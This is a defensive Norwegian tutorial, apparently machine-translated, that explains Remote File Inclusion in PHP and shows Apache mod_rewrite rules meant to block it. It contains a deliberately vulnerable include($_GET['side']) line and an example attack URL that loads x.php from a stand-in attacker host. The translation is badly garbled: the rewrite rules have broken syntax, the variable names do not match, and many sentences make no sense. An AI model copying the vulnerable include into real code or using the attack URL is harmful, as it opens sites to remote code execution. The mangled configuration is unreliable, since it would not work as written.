Bruk mod_rewrite å hindre inkludering av eksterne filer

En av de mest hyppige angrepene led av nettsteder er gjort gjennom forsøket på å inkludere filer som inneholder ondsinnet kode, teoretisk snakker om et angrep er svært enkel å utføre, for å gjøre det bare fordi en fil som inneholder ondsinnet kode og en URL for å skrive browser.

Denne typen angrep, kjent fra den tekniske betegnelsen for Remote File inkludering eller med enkle akronym for RFI, er ofte forbundet med en modus kalt innbrudd XSA (Cross-Server Attack) vanligvis gjøres for å kompromittere sikkerheten til nettsteder hvis ikke webserveren, en faktor som gjør det enda farligere å RFI.

For å starte et angrep RFI, må en angriper et "minne" i et program der å gjøre sin inkludering eksternt, dette er "space" generelt et "hull" (bug) sikkerhet som gjør det til en sårbar script.
Den klassiske tilfelle av en lekkasje følsomme for RFI er relatert til bestått siden via variabelnavn, bare en enkel kodebit som dette for å sette et program:

 



 # Inkluder filer via spørrestrengsamling variable passerte gjennom







 include ($ _GET ['side']);

 

I koden vi har en udefinert variabel, eller snarere å være definert i henhold til parametre som sendes gjennom spørrestrengsamling, for eksempel hvis de direkte URL til siden som inneholder den foreslåtte liste ville se slik ut:

 



 http://www.sito.com/index.php?pagina=news.php

 

verdien av variabelen $ side er lik "News" et angrep på denne søknaden kan utføres på denne måten:

 



 http://www.sito.com/index.php?pagina=http://www.attacco.com/x.php

 

Filen "x.php", i tilfelle av et vellykket angrep, kan inneholde noen form for ondsinnet kode og forårsake skade langt mer omfattende og definitive enn enkelheten i angrepet kan gjøres for å tenke.

Heldigvis er det noen forsvar teknikker som kan brukes til å forhindre slike angrep, i løpet av denne korte diskusjonen skal vi analysere en basert på nettadresseomskriving modul (mod_rewrite) gitt av Apache webserver, som kan benyttes av metoder annerledes.

En av de mest klassiske å sende instruksjoner til en Apache web server er å bruke en klassiker. Htaccess fil som skal inkluderes i mappen du ønsker å beskytte mot angrep.

Den første metoden som vi bruker er å sette inn en enkel regel i a. htaccess-filen:

 RewriteCond% {QUERY_STRING} (.*)( http | https | ftp): \ / \ /(.*)







 ^(.+)$ RewriteRule - [F]

Regelen sier at formulert i en spørrestrengsamling ("{QUERY_STRING}") kan ikke være bestått argumenter som inneholder suffiksene "http", "https" og "ftp" uansett hva innholdet i forrige eller neste ("(.*)" ) parametere. Hvis dette skjer webserveren vil returnere en feil av typen 403 (forbudt).

De som har mulighet for direkte tilgang til konfigurasjonsfilen til Apache (httpd.conf), kan den settes inn i en enkelt container som inneholder et direktiv kan ha en effekt tilsvarende reglene prededentemente:

 # Sjekk at mod_rewrite er tilgjengelig







 <IfModule Mod_rewrite.c>







 # Aktiver nettadresseomskriving motor

 





 RewriteEngine på

 





 # Vi setter våre regler mot RFI







 RewriteCond% {QUERY_STRING} (.*)( http | https | ftp): \ / \ /(.*)







 # Filter ut mulige forespørsler om inkludering og merke opp







 # Vraibile med miljøet [E = varname: verdi]







 ^(.+)$ RewriteRule - [F, E = RFI: true]

 





 </ IfModule>

 





 # Creaimo en logg over forsøk på å RFI vi identficato







 # Tidligere hjelp av en "miljøvariabelen"







 CustomLog / mappenavn / rfi.log kombinert ENV = RFI

Etter skriftlig direktivet i konfigurasjonsfilen, må du lagre endringene og restart webserveren skal tre i kraft, være oppmerksom på at ved slutten av oppføringen, og utsiden av container har blitt satt inn forespørselen om å lage en loggfil hensikt å registrere henvendelser fra ekstern fil inkludering, overvåking av denne lille "blokkering notater for RFI angrep," vil vi oppdage at forsøk på Remote File inkluderingsdepartementet til våre nettsider er mindre uvanlig enn trodd.